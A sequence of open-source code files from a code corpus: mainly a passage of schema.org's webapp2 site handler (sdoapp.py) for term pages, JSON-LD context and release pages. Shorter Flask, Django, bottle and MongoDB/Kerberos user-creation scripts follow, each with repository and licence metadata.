domains = sorted(GetTargets(di, node, layers=layers), key=lambda u: u.id)
first_range = True
newerprop = node.supersededBy(layers=layers) # None of one. e.g. we're on 'seller'(new) page, we get 'vendor'(old)
olderprop = node.supersedes(layers=layers) # None or one
olderprops = node.supersedes_all(layers=layers) # list, e.g. 'seller' has 'vendor', 'merchant'.
inverseprop = node.inverseproperty(layers=layers)
subprops = node.subproperties(layers=layers)
superprops = node.superproperties(layers=layers)
if (inverseprop != None):
tt = "This means the same thing, but with the relationship direction reversed."
out.write("<p>Inverse-property: %s.</p>" % (self.ml(inverseprop, inverseprop.id,tt, prop=False, hashorslash=hashorslash)) )
out.write("<table class=\"definition-table\">\n")
out.write("<thead>\n <tr>\n <th>Values expected to be one of these types</th>\n </tr>\n</thead>\n\n <tr>\n <td>\n ")
for r in ranges:
if (not first_range):
out.write("<br/>")
first_range = False
tt = "The '%s' property has values that include instances of the '%s' type." % (node.id, r.id)
out.write(" <code>%s</code> " % (self.ml(r, r.id, tt, prop="rangeIncludes", hashorslash=hashorslash) +"\n"))
out.write(" </td>\n </tr>\n</table>\n\n")
first_domain = True
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Used on these types</th>\n </tr>\n</thead>\n<tr>\n <td>")
for d in domains:
if (not first_domain):
out.write("<br/>")
first_domain = False
tt = "The '%s' property is used on the '%s' type." % (node.id, d.id)
out.write("\n <code>%s</code> " % (self.ml(d, d.id, tt, prop="domainIncludes",hashorslash=hashorslash)+"\n" ))
out.write(" </td>\n </tr>\n</table>\n\n")
if (subprops != None and len(subprops) > 0):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Sub-properties</th>\n </tr>\n</thead>\n")
for sbp in subprops:
c = GetComment(sbp,layers=layers)
tt = "%s: ''%s''" % ( sbp.id, c)
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(sbp, sbp.id, tt, hashorslash=hashorslash)))
out.write("\n</table>\n\n")
# Super-properties
if (superprops != None and len(superprops) > 0):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Super-properties</th>\n </tr>\n</thead>\n")
for spp in superprops:
c = GetComment(spp, layers=layers) # markup needs to be stripped from c, e.g. see 'logo', 'photo'
c = re.sub(r'<[^>]*>', '', c) # This is not a sanitizer, we trust our input.
tt = "%s: ''%s''" % ( spp.id, c)
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(spp, spp.id, tt,hashorslash)))
out.write("\n</table>\n\n")
# Supersedes
if (olderprops != None and len(olderprops) > 0):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th>Supersedes</th>\n </tr>\n</thead>\n")
for o in olderprops:
c = GetComment(o, layers=layers)
tt = "%s: ''%s''" % ( o.id, c)
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(o, o.id, tt, hashorslash)))
out.write("\n</table>\n\n")
# supersededBy (at most one direct successor)
if (newerprop != None):
out.write("<table class=\"definition-table\">\n")
out.write(" <thead>\n <tr>\n <th><a href=\"/supersededBy\">supersededBy</a></th>\n </tr>\n</thead>\n")
tt="supersededBy: %s" % newerprop.id
out.write("\n <tr><td><code>%s</code></td></tr>\n" % (self.ml(newerprop, newerprop.id, tt,hashorslash)))
out.write("\n</table>\n\n")
def rep(self, markup):
"""Replace < and > with HTML escape chars."""
m1 = re.sub("<", "<", markup)
m2 = re.sub(">", ">", m1)
# TODO: Ampersand? Check usage with examples.
return m2
def handleHomepage(self, node):
"""Send the homepage, or if no HTML accept header received and JSON-LD was requested, send JSON-LD context file.
typical browser accept list: ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8')
# e.g. curl -H "Accept: application/ld+json" http://localhost:8080/
see also http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
https://github.com/rvguha/schemaorg/issues/5
https://github.com/rvguha/schemaorg/wiki/JsonLd
"""
accept_header = self.request.headers.get('Accept').split(',')
logging.info("accepts: %s" % self.request.headers.get('Accept'))
if ENABLE_JSONLD_CONTEXT:
jsonldcontext = GetJsonLdContext(layers=ALL_LAYERS)
# Homepage is content-negotiated. HTML or JSON-LD.
mimereq = {}
for ah in accept_header:
ah = re.sub( r";q=\d?\.\d+", '', ah).rstrip()
mimereq[ah] = 1
html_score = mimereq.get('text/html', 5)
xhtml_score = mimereq.get('application/xhtml+xml', 5)
jsonld_score = mimereq.get('application/ld+json', 10)
# print "accept_header: " + str(accept_header) + " mimereq: "+str(mimereq) + "Scores H:{0} XH:{1} J:{2} ".format(html_score,xhtml_score,jsonld_score)
if (ENABLE_JSONLD_CONTEXT and (jsonld_score < html_score and jsonld_score < xhtml_score)):
self.response.headers['Content-Type'] = "application/ld+json"
self.emitCacheHeaders()
self.response.out.write( jsonldcontext )
return True
else:
# Serve a homepage from template
# the .tpl has responsibility for extension homepages
# TODO: pass in extension, base_domain etc.
sitekeyedhomepage = "homepage %s" % sitename
hp = DataCache.get(sitekeyedhomepage)
if hp != None:
self.response.out.write( hp )
#log.info("Served datacache homepage.tpl key: %s" % sitekeyedhomepage)
log.debug("Served datacache homepage.tpl key: %s" % sitekeyedhomepage)
else:
template = JINJA_ENVIRONMENT.get_template('homepage.tpl')
template_values = {
'ENABLE_HOSTED_EXTENSIONS': ENABLE_HOSTED_EXTENSIONS,
'SCHEMA_VERSION': SCHEMA_VERSION,
'sitename': sitename,
'myhost': myhost,
'myport': myport,
'mybasehost': mybasehost,
'host_ext': getHostExt(),
'home_page': "True",
'debugging': debugging
}
# We don't want JINJA2 doing any cachine of included sub-templates.
page = template.render(template_values)
self.response.out.write( page )
log.debug("Served and cached fresh homepage.tpl key: %s " % sitekeyedhomepage)
#log.info("Served and cached fresh homepage.tpl key: %s " % sitekeyedhomepage)
DataCache.put(sitekeyedhomepage, page)
# self.response.out.write( open("static/index.html", 'r').read() )
return True
log.info("Warning: got here how?")
return False
def getExtendedSiteName(self, layers):
"""Returns site name (domain name), informed by the list of active layers."""
if layers==["core"]:
return "schema.org"
if len(layers)==0:
return "schema.org"
return (getHostExt() + ".schema.org")
def emitSchemaorgHeaders(self, entry='', is_class=False, ext_mappings='', sitemode="default", sitename="schema.org"):
"""
Generates, caches and emits HTML headers for class, property and enumeration pages. Leaves <body> open.
* entry = name of the class or property
"""
rdfs_type = 'rdfs:Property'
if is_class:
rdfs_type = 'rdfs:Class'
generated_page_id = "genericTermPageHeader-%s-%s" % ( str(entry), sitename )
gtp = DataCache.get( generated_page_id )
if gtp != None:
self.response.out.write( gtp )
log.debug("Served recycled genericTermPageHeader.tpl for %s" % generated_page_id )
else:
template = JINJA_ENVIRONMENT.get_template('genericTermPageHeader.tpl')
template_values = {
'entry': str(entry),
'sitemode': sitemode,
'sitename': sitename,
'menu_sel': "Schemas",
'rdfs_type': rdfs_type,
'ext_mappings': ext_mappings
}
out = template.render(template_values)
DataCache.put(generated_page_id,out)
log.debug("Served and cached fresh genericTermPageHeader.tpl for %s" % generated_page_id )
self.response.write(out)
def emitExactTermPage(self, node, layers="core"):
"""Emit a Web page that exactly matches this node."""
log.debug("EXACT PAGE: %s" % node.id)
self.outputStrings = [] # blank slate
ext_mappings = GetExtMappingsRDFa(node, layers=layers)
global sitemode, sitename
if ("schema.org" not in self.request.host and sitemode == "mainsite"):
sitemode = "mainsite testsite"
self.emitSchemaorgHeaders(node.id, node.isClass(), ext_mappings, sitemode, sitename)
if ( ENABLE_HOSTED_EXTENSIONS and ("core" not in layers or len(layers)>1) ):
ll = " ".join(layers).replace("core","")
target=""
if inLayer("core", node):
target = node.id
s = "<p id='lli' class='layerinfo %s'><a href=\"https://github.com/schemaorg/schemaorg/wiki/ExtensionList\">extension shown</a>: %s [<a href='%s'>x</a>]</p>\n" % (ll, ll, makeUrl("",target))
self.write(s)
cached = self.GetCachedText(node, layers)
if (cached != None):
self.response.write(cached)
return
self.parentStack = []
self.GetParentStack(node, layers=layers)
self.emitUnitHeaders(node, layers=layers) # writes <h1><table>...
if (node.isClass(layers=layers)):
subclass = True
for p in self.parentStack:
self.ClassProperties(p, p==self.parentStack[0], layers=layers)
if (not node.isDataType(layers=layers) and node.id != "DataType"):
self.write("\n\n</table>\n\n")
self.emitClassIncomingProperties(node, layers=layers)
self.emitClassExtensionSuperclasses(node,layers)
self.emitClassExtensionProperties(p,layers)
elif (Unit.isAttribute(node, layers=layers)):
self.emitAttributeProperties(node, layers=layers)
if (node.isClass(layers=layers)):
children = []
children = GetSources(Unit.GetUnit("rdfs:subClassOf"), node, ALL_LAYERS)# Normal subclasses
if(node.isDataType() or node.id == "DataType"):
children += GetSources(Unit.GetUnit("typeOf"), node, ALL_LAYERS)# Datatypes
children = sorted(children, key=lambda u: u.id)
if (len(children) > 0):
buff = StringIO.StringIO()
extbuff = StringIO.StringIO()
firstext=True
for c in children:
if inLayer(layers, c):
buff.write("<li> %s </li>" % (self.ml(c)))
else:
sep = ", "
if firstext:
sep = ""
firstext=False
extbuff.write("%s%s" % (sep,self.ml(c)) )
if (len(buff.getvalue()) > 0):
if node.isDataType():
self.write("<br/><b>More specific DataTypes</b><ul>")
else:
self.write("<br/><b>More specific Types</b><ul>")
self.write(buff.getvalue())
self.write("</ul>")
if (len(extbuff.getvalue()) > 0):
self.write("<h4>More specific Types available in extensions</h4><ul><li>")
self.write(extbuff.getvalue())
self.write("</li></ul>")
buff.close()
extbuff.close()
if (node.isEnumeration(layers=layers)):
children = sorted(GetSources(Unit.GetUnit("typeOf"), node, ALL_LAYERS), key=lambda u: u.id)
if (len(children) > 0):
buff = StringIO.StringIO()
extbuff = StringIO.StringIO()
firstext=True
for c in children:
if inLayer(layers, c):
buff.write("<li> %s </li>" % (self.ml(c)))
else:
sep = ","
if firstext:
sep = ""
firstext=False
extbuff.write("%s%s" % (sep,self.ml(c)) )
if (len(buff.getvalue()) > 0):
self.write("<br/><br/><b>Enumeration members</b><ul>")
self.write(buff.getvalue())
self.write("</ul>")
if (len(extbuff.getvalue()) > 0):
self.write("<h4>Enumeration members available in extensions</h4><ul><li>")
self.write(extbuff.getvalue())
self.write("</li></ul>")
buff.close()
extbuff.close()
ackorgs = GetTargets(Unit.GetUnit("dc:source"), node, layers=layers)
if (len(ackorgs) > 0):
self.write("<h4 id=\"acks\">Acknowledgements</h4>\n")
for ao in ackorgs:
acks = sorted(GetTargets(Unit.GetUnit("rdfs:comment"), ao, layers))
for ack in acks:
self.write(str(ack+"<br/>"))
examples = GetExamples(node, layers=layers)
log.debug("Rendering n=%s examples" % len(examples))
if (len(examples) > 0):
example_labels = [
('Without Markup', 'original_html', 'selected'),
('Microdata', 'microdata', ''),
('RDFa', 'rdfa', ''),
('JSON-LD', 'jsonld', ''),
]
self.write("<br/><br/><b><a id=\"examples\">Examples</a></b><br/><br/>\n\n")
for ex in examples:
if "id" in ex.egmeta:
self.write('<span id="%s"></span>' % ex.egmeta["id"])
self.write("<div class='ds-selector-tabs ds-selector'>\n")
self.write(" <div class='selectors'>\n")
for label, example_type, selected in example_labels:
self.write(" <a data-selects='%s' class='%s'>%s</a>\n"
% (example_type, selected, label))
self.write("</div>\n\n")
for label, example_type, selected in example_labels:
self.write("<pre class=\"prettyprint lang-html linenums %s %s\">%s</pre>\n\n"
% (example_type, selected, self.rep(ex.get(example_type))))
self.write("</div>\n\n")
self.write("<p class=\"version\"><b>Schema Version %s</b></p>\n\n" % SCHEMA_VERSION)
# TODO: add some version info regarding the extension
# Analytics
self.write("""<script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-52672119-1', 'auto');ga('send', 'pageview');</script>""")
self.write(" \n\n</div>\n</body>\n</html>")
self.response.write(self.AddCachedText(node, self.outputStrings, layers))
def emitHTTPHeaders(self, node):
if ENABLE_CORS:
self.response.headers.add_header("Access-Control-Allow-Origin", "*") # entire site is public.
# see http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
def handleHTTPRedirection(self, node):
return False # none yet.
# https://github.com/schemaorg/schemaorg/issues/4
def setupExtensionLayerlist(self, node):
# Identify which extension layer(s) are requested
# TODO: add subdomain support e.g. bib.schema.org/Globe
# instead of Globe?ext=bib which is more for debugging.
# 1. get a comma list from ?ext=foo,bar URL notation
extlist = cleanPath( self.request.get("ext") )# for debugging
extlist = re.sub(ext_re, '', extlist).split(',')
log.debug("?ext= extension list: %s " % ", ".join(extlist))
# 2. Ignore ?ext=, start with 'core' only.
layerlist = [ "core"]
# 3. Use host_ext if set, e.g. 'bib' from bib.schema.org
if getHostExt() != None:
log.debug("Host: %s host_ext: %s" % ( self.request.host , getHostExt() ) )
extlist.append(getHostExt())
# Report domain-requested extensions
for x in extlist:
log.debug("Ext filter found: %s" % str(x))
if x in ["core", "localhost", ""]:
continue
layerlist.append("%s" % str(x))
layerlist = list(set(layerlist)) # dedup
log.debug("layerlist: %s" % layerlist)
return layerlist
def handleJSONContext(self, node):
"""Handle JSON-LD Context non-homepage requests (including refuse if not enabled)."""
if not ENABLE_JSONLD_CONTEXT:
self.error(404)
self.response.out.write('<title>404 Not Found.</title><a href="/">404 Not Found (JSON-LD Context not enabled.)</a><br/><br/>')
return True
if (node=="docs/jsonldcontext.json.txt"):
jsonldcontext = GetJsonLdContext(layers=ALL_LAYERS)
self.response.headers['Content-Type'] = "text/plain"
self.emitCacheHeaders()
self.response.out.write( jsonldcontext )
return True
if (node=="docs/jsonldcontext.json"):
jsonldcontext = GetJsonLdContext(layers=ALL_LAYERS)
self.response.headers['Content-Type'] = "application/ld+json"
self.emitCacheHeaders()
self.response.out.write( jsonldcontext )
return True
return False
# see also handleHomepage for conneg'd version.
def handleFullHierarchyPage(self, node, layerlist='core'):
self.response.headers['Content-Type'] = "text/html"
self.emitCacheHeaders()
if DataCache.get('FullTreePage'):
self.response.out.write( DataCache.get('FullTreePage') )
log.debug("Serving recycled FullTreePage.")
return True
else:
template = JINJA_ENVIRONMENT.get_template('full.tpl')
extlist=""
count=0
for i in layerlist:
if i != "core":
sep = ""
if count > 0:
sep = ", "
extlist += "plus '%s'%s" % (i, sep)
count += 1
local_button = ""
local_label = "<h3>Core %s extension vocabularies</h3>" % extlist
if count == 0:
local_button = "Core vocabulary"
elif count == 1:
local_button = "Core %s extension" % extlist
else:
local_button = "Core %s extensions" % extlist
uThing = Unit.GetUnit("Thing")
uDataType = Unit.GetUnit("DataType")
mainroot = TypeHierarchyTree(local_label)
mainroot.traverseForHTML(uThing, layers=layerlist)
thing_tree = mainroot.toHTML()
fullmainroot = TypeHierarchyTree("<h3>Core plus all extension vocabularies</h3>")
fullmainroot.traverseForHTML(uThing, layers=ALL_LAYERS)
full_thing_tree = fullmainroot.toHTML()
dtroot = TypeHierarchyTree("<h4>Data Types</h4>")
dtroot.traverseForHTML(uDataType, layers=layerlist)
datatype_tree = dtroot.toHTML()
full_button = "Core plus all extensions"
page = template.render({ 'thing_tree': thing_tree,
'full_thing_tree': full_thing_tree,
'datatype_tree': datatype_tree,
'local_button': local_button,
'full_button': full_button,
'sitename': sitename,
'menu_sel': "Schemas"})
self.response.out.write( page )
log.debug("Serving fresh FullTreePage.")
DataCache.put("FullTreePage",page)
return True
def handleJSONSchemaTree(self, node, layerlist='core'):
"""Handle a request for a JSON-LD tree representation of the schemas (RDFS-based)."""
self.response.headers['Content-Type'] = "application/ld+json"
self.emitCacheHeaders()
if DataCache.get('JSONLDThingTree'):
self.response.out.write( DataCache.get('JSONLDThingTree') )
log.debug("Serving recycled JSONLDThingTree.")
return True
else:
uThing = Unit.GetUnit("Thing")
mainroot = TypeHierarchyTree()
mainroot.traverseForJSONLD(Unit.GetUnit("Thing"), layers=layerlist)
thing_tree = mainroot.toJSON()
self.response.out.write( thing_tree )
log.debug("Serving fresh JSONLDThingTree.")
DataCache.put("JSONLDThingTree",thing_tree)
return True
return False
def handleExactTermPage(self, node, layers='core'):
"""Handle with requests for specific terms like /Person, /fooBar. """
#self.outputStrings = [] # blank slate
schema_node = Unit.GetUnit(node) # e.g. "Person", "CreativeWork".
log.debug("Layers: %s",layers)
if inLayer(layers, schema_node):
self.emitExactTermPage(schema_node, layers=layers)
return True
else:
# log.info("Looking for node: %s in layers: %s" % (node.id, ",".join(all_layers.keys() )) )
if not ENABLE_HOSTED_EXTENSIONS:
return False
if schema_node is not None and schema_node.id in all_terms:# look for it in other layers
log.debug("TODO: layer toc: %s" % all_terms[schema_node.id] )
# self.response.out.write("Layers should be listed here. %s " % all_terms[node.id] )
extensions = []
for x in all_terms[schema_node.id]:
x = x.replace("#","")
ext = {}
ext['href'] = makeUrl(x,schema_node.id)
ext['text'] = x
extensions.append(ext)
#self.response.out.write("<li><a href='%s'>%s</a></li>" % (makeUrl(x,schema_node.id), x) )
template = JINJA_ENVIRONMENT.get_template('wrongExt.tpl')
page = template.render({ 'target': schema_node.id,
'extensions': extensions,
'sitename': "schema.org"})
self.response.out.write( page )
log.debug("Serving fresh wrongExtPage.")
return True
return False
def handle404Failure(self, node, layers="core"):
self.error(404)
self.emitSchemaorgHeaders("404 Missing")
self.response.out.write('<h3>404 Not Found.</h3><p><br/>Page not found. Please <a href="/">try the homepage.</a><br/><br/></p>')
clean_node = cleanPath(node)
log.debug("404: clean_node: clean_node: %s node: %s" % (clean_node, node))
base_term = Unit.GetUnit( node.rsplit('/')[0] )
if base_term != None :
self.response.out.write('<div>Perhaps you meant: <a href="/%s">%s</a></div> <br/><br/> ' % ( base_term.id, base_term.id ))
base_actionprop = Unit.GetUnit( node.rsplit('-')[0] )
if base_actionprop != None :
self.response.out.write('<div>Looking for an <a href="/Action">Action</a>-related property? Note that xyz-input and xyz-output have <a href="/docs/actions.html">special meaning</a>. See also: <a href="/%s">%s</a></div> <br/><br/> ' % ( base_actionprop.id, base_actionprop.id ))
return True
def handleJSONSchemaTree(self, node, layerlist='core'):
"""Handle a request for a JSON-LD tree representation of the schemas (RDFS-based)."""
self.response.headers['Content-Type'] = "application/ld+json"
self.emitCacheHeaders()
if DataCache.get('JSONLDThingTree'):
self.response.out.write( DataCache.get('JSONLDThingTree') )
log.debug("Serving recycled JSONLDThingTree.")
return True
else:
uThing = Unit.GetUnit("Thing")
mainroot = TypeHierarchyTree()
mainroot.traverseForJSONLD(Unit.GetUnit("Thing"), layers=layerlist)
thing_tree = mainroot.toJSON()
self.response.out.write( thing_tree )
log.debug("Serving fresh JSONLDThingTree.")
DataCache.put("JSONLDThingTree",thing_tree)
return True
return False
# if (node == "version/2.0/" or node == "version/latest/" or "version/" in node) ...
def handleFullReleasePage(self, node, layerlist='core'):
"""Deal with a request for a full release summary page. Lists all terms and their descriptions inline in one long page.
version/latest/ is from current schemas, others will need to be loaded and emitted from stored HTML snapshots (for now)."""
# http://jinja.pocoo.org/docs/dev/templates/
global releaselog
clean_node = cleanPath(node)
self.response.headers['Content-Type'] = "text/html"
self.emitCacheHeaders()
requested_version = clean_node.rsplit('/')[1]
requested_format = clean_node.rsplit('/')[-1]
if len( clean_node.rsplit('/') ) == 2:
requested_format=""
log.info("Full release page for: node: '%s' cleannode: '%s' requested_version: '%s' requested_format: '%s' l: %s" % (node, clean_node, requested_version, requested_format, len(clean_node.rsplit('/')) ) )
# Full release page for: node: 'version/' cleannode: 'version/' requested_version: '' requested_format: '' l: 2
# /version/
if (clean_node=="version/" or clean_node=="version") and requested_version=="" and requested_format=="":
log.info("Table of contents should be sent instead, then succeed.")
if DataCache.get('tocVersionPage'):
self.response.out.write( DataCache.get('tocVersionPage'))
return True
else:
template = JINJA_ENVIRONMENT.get_template('tocVersionPage.tpl')
page = template.render({ "releases": releaselog.keys(),
"menu_sel": "Schemas",
"sitename": sitename})
self.response.out.write( page )
log.debug("Serving fresh tocVersionPage.")
DataCache.put("tocVersionPage",page)
return True
if requested_version in releaselog:
log.info("Version '%s' was released on %s. Serving from filesystem." % ( node, releaselog[requested_version] ))
version_rdfa = "data/releases/%s/schema.rdfa" % requested_version
version_allhtml = "data/releases/%s/schema-all.html" % requested_version
version_nt = "data/releases/%s/schema.nt" % requested_version
if requested_format=="":
self.response.out.write( open(version_allhtml, 'r').read() )
return True
# log.info("Skipping filesystem for now.")
if requested_format=="schema.rdfa":
self.response.headers['Content-Type'] = "application/octet-stream" # It is HTML but ... not really.
self.response.headers['Content-Disposition']= "attachment; filename=schemaorg_%s.rdfa.html" % requested_version
self.response.out.write( open(version_rdfa, 'r').read() )
return True
if requested_format=="schema.nt":
self.response.headers['Content-Type'] = "application/n-triples" # It is HTML but ... not really.
self.response.headers['Content-Disposition']= "attachment; filename=schemaorg_%s.rdfa.nt" % requested_version
self.response.out.write( open(version_nt, 'r').read() )
return True
if requested_format != "":
return False # Turtle, csv etc.
else:
log.info("Unreleased version requested. We only understand requests for latest if unreleased.")
if requested_version != "latest":
return False
log.info("giving up to 404.")
else:
log.info("generating a live view of this latest release.")
if DataCache.get('FullReleasePage'):
self.response.out.write( DataCache.get('FullReleasePage') )
log.debug("Serving recycled FullReleasePage.")
return True
else:
template = JINJA_ENVIRONMENT.get_template('fullReleasePage.tpl')
mainroot = TypeHierarchyTree()
mainroot.traverseForHTML(Unit.GetUnit("Thing"), hashorslash="#term_", layers=layerlist)
thing_tree = mainroot.toHTML()
base_href = "/version/%s/" % requested_version
az_types = GetAllTypes()
az_types.sort( key=lambda u: u.id)
az_type_meta = {}
az_props = GetAllProperties()
az_props.sort( key = lambda u: u.id)
az_prop_meta = {}
#TODO: ClassProperties (self, cl, subclass=False, layers="core", out=None, hashorslash="/"):
# TYPES
for t in az_types:
props4type = HTMLOutput() # properties applicable for a type
props2type = HTMLOutput() # properties that go into a type
self.emitSimplePropertiesPerType(t, out=props4type, hashorslash="#term_" )
self.emitSimplePropertiesIntoType(t, out=props2type, hashorslash="#term_" )
#self.ClassProperties(t, out=typeInfo, hashorslash="#term_" )
tcmt = Markup(GetComment(t))
az_type_meta[t]={}
az_type_meta[t]['comment'] = tcmt
az_type_meta[t]['props4type'] = props4type.toHTML()
az_type_meta[t]['props2type'] = props2type.toHTML()
# PROPERTIES
for pt in az_props:
attrInfo = HTMLOutput()
rangeList = HTMLOutput()
domainList = HTMLOutput()
# self.emitAttributeProperties(pt, out=attrInfo, hashorslash="#term_" )
# self.emitSimpleAttributeProperties(pt, out=rangedomainInfo, hashorslash="#term_" )
self.emitRangeTypesForProperty(pt, out=rangeList, hashorslash="#term_" )
self.emitDomainTypesForProperty(pt, out=domainList, hashorslash="#term_" )
cmt = Markup(GetComment(pt))
az_prop_meta[pt] = {}
az_prop_meta[pt]['comment'] = cmt
az_prop_meta[pt]['attrinfo'] = attrInfo.toHTML()
az_prop_meta[pt]['rangelist'] = rangeList.toHTML()
az_prop_meta[pt]['domainlist'] = domainList.toHTML()
page = template.render({ "base_href": base_href, 'thing_tree': thing_tree,
'liveversion': SCHEMA_VERSION,
'requested_version': requested_version,
'releasedate': releaselog[str(SCHEMA_VERSION)],
'az_props': az_props, 'az_types': az_types,
'az_prop_meta': az_prop_meta, 'az_type_meta': az_type_meta,
'sitename': sitename,
'menu_sel': "Documentation"})
self.response.out.write( page )
log.debug("Serving fresh FullReleasePage.")
DataCache.put("FullReleasePage",page)
return True
def setupHostinfo(self, node, test=""):
global debugging, host_ext, myhost, myport, mybasehost
hostString = test
if test == "":
hostString = self.request.host
host_ext = re.match( r'([\w\-_]+)[\.:]?', hostString).group(1)
log.debug("setupHostinfo: srh=%s host_ext2=%s" % (hostString, str(host_ext) ))
split = hostString.rsplit(':')
myhost = split[0]
mybasehost = myhost
myport = "80"
if len(split) > 1:
myport = split[1]
if host_ext != None:
# e.g. "bib"
log.debug("HOST: Found %s in %s" % ( host_ext, hostString ))
if host_ext == "www":
# www is special case that cannot be an extension - need to redirect to basehost
mybasehost = mybasehost[4:]
return self.redirectToBase(node)
elif not host_ext in ENABLED_EXTENSIONS:
host_ext = ""
else:
mybasehost = mybasehost[len(host_ext) + 1:]
dcn = host_ext
if dcn == None or dcn == "" or dcn =="core":
dcn = "core"
log.debug("sdoapp.py setting current datacache to: %s " % dcn)
DataCache.setCurrent(dcn)
debugging = False
if "localhost" in hostString or "sdo-ganymede.appspot.com" in hostString:
debugging = True
return True
def redirectToBase(self,node=""):
uri = makeUrl("",node)
self.response = webapp2.redirect(uri, True, 301)
log.info("Redirecting [301] to: %s" % uri)
return False
def get(self, node):
"""Get a schema.org site page generated for this node/term.
Web content is written directly via self.response.
CORS enabled all URLs - we assume site entirely public.
See http://en.wikipedia.org/wiki/Cross-origin_resource_sharing
These should give a JSON version of schema.org:
curl --verbose -H "Accept: application/ld+json" http://localhost:8080/docs/jsonldcontext.json
curl --verbose -H "Accept: application/ld+json" http://localhost:8080/docs/jsonldcontext.json.txt
curl --verbose -H "Accept: application/ld+json" http://localhost:8080/
Per-term pages vary for type, property and enumeration.
Last resort is a 404 error if we do not exactly match a term's id.
See also https://webapp-improved.appspot.com/guide/request.html#guide-request
"""
global debugging, host_ext, myhost, myport, mybasehost, sitename
if not self.setupHostinfo(node):
return
self.emitHTTPHeaders(node)
if self.handleHTTPRedirection(node):
return
if (node in silent_skip_list):
return
if ENABLE_HOSTED_EXTENSIONS:
layerlist = self.setupExtensionLayerlist(node) # e.g. ['core', 'bib']
else:
layerlist = ["core"]
sitename = self.getExtendedSiteName(layerlist) # e.g. 'bib.schema.org', 'schema.org'
log.debug("EXT: set sitename to %s " % sitename)
if (node in ["", "/"]):
if self.handleHomepage(node):
return
else:
log.info("Error handling homepage: %s" % node)
return
if node in ["docs/jsonldcontext.json.txt", "docs/jsonldcontext.json"]:
if self.handleJSONContext(node):
return
else:
log.info("Error handling JSON-LD context: %s" % node)
return
if (node == "docs/full.html"): # DataCache.getDataCache.get
if self.handleFullHierarchyPage(node, layerlist=layerlist):
return
else:
log.info("Error handling full.html : %s " % node)
return
if (node == "docs/tree.jsonld" or node == "docs/tree.json"):
if self.handleJSONSchemaTree(node, layerlist=layerlist):
return
else:
log.info("Error handling JSON-LD schema tree: %s " % node)
return
if (node == "version/2.0/" or node == "version/latest/" or "version/" in node):
if self.handleFullReleasePage(node, layerlist=layerlist):
return
else:
log.info("Error handling full release page: %s " % node)
if self.handle404Failure(node):
return
else:
log.info("Error handling 404 under /version/")
return
# Pages based on request path matching a Unit in the term graph:
if self.handleExactTermPage(node, layers=layerlist):
return
else:
log.info("Error handling exact term page. Assuming a 404: %s" % node)
# Drop through to 404 as default exit.
if self.handle404Failure(node):
return
else:
log.info("Error handling 404.")
return
def getHostExt():
return host_ext
def getBaseHost():
return mybasehost
def getHostPort():
return myport
def makeUrl(ext="",path=""):
port = ""
sub = ""
p = ""
if(getHostPort() != "80"):
port = ":%s" % getHostPort()
if ext != "core" and ext != "":
sub = "%s." % ext
if path != "":
if path.startswith("/"):
p = path
else:
p = "/%s" % path
url = "http://%s%s%s%s" % (sub,getBaseHost(),port,p)
return url
#log.info("STARTING UP... reading schemas.")
read_schemas(loadExtensions=ENABLE_HOSTED_EXTENSIONS)
if ENABLE_HOSTED_EXTENSIONS:
read_extensions(ENABLED_EXTENSIONS)
schemasInitialized = True
app = ndb.toplevel(webapp2.WSGIApplication([("/(.*)", ShowUnit)]))
| cesarmarinhorj/schemaorg | sdoapp.py | Python | apache-2.0 | 67,019 |
# coding: utf-8
from flask import render_template, Blueprint
bp = Blueprint('site', __name__)
@bp.route('/')
def index():
"""Index page."""
return render_template('site/index/index.html')
@bp.route('/about')
def about():
"""About page."""
return render_template('site/about/about.html')
| hustlzp/Flask-Boost | flask_boost/project/application/controllers/site.py | Python | mit | 308 |
#!/usr/bin/python
import pexpect, argparse, kadmin, ktutil
from subprocess import check_output
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='''
This script create a new mongo user with kerberos principal
''')
parser.add_argument('-n', '--principalName', default=None, help='Principal name')
parser.add_argument('-d', '--database', default='test', help='Mongo Db')
parser.add_argument('-r', '--roles', default='read', help='Comma separated list of roles')
parser.add_argument('-p', '--password', default=None, help='Password')
parser.add_argument('-k', '--keytab', default=None, help='Keytab name (optional)')
args = parser.parse_args()
domain = str(check_output("grep default_realm /etc/krb5.conf | awk '{print $NF}'", shell=True)).strip()
roles = ','.join([ '"' + role + '"' for role in args.roles.split(',') ])
kadmin.kadmin('addprinc ' + args.principalName, args.password)
print str(check_output(['/mongodb/bin/mongo', '--eval', 'db = db.getSiblingDB("' + args.database + '"); db.system.users.remove( { user: "' + args.principalName + '@' + domain + '" } ); db.addUser( { "user": "' + args.principalName + '@' + domain + '", "roles": [' + roles + '], "userSource": "$external" } )']))
if args.keytab is not None:
ktutil.ktutil(['addent -password -p ' + args.principalName + '@' + domain + ' -k 1 -e aes256-cts', 'wkt ' + args.keytab], [args.password])
| brosander/pentaho-docker | mongo/mongo-kerberos/createUser.py | Python | apache-2.0 | 1,416 |
from django.contrib import admin
from rango.models import Category, Page
class PageAdmin(admin.ModelAdmin):
list_display = ('title', 'category', 'url')
admin.site.register(Category)
admin.site.register(Page, PageAdmin)
| jonellalvi/tango_with_django | rango/admin.py | Python | mit | 227 |
#!/usr/bin/python3
import bottle
import networkx
import networkx.readwrite.json_graph
import json
import os
@bottle.route('/dependencies')
def dependencies():
# In reality, this has do some parsing of Plink Makefiles and
# the Debian package metadata to get a real idea of the dependencies.
pass
@bottle.route('/messagequeue-port')
def messagequeue_port():
pass
class ConcourseShim(object):
# Concourse UI can display multiple groups of pipelines. They are listed
# in a row along the top of the window. We assume there's just one group,
# for now.
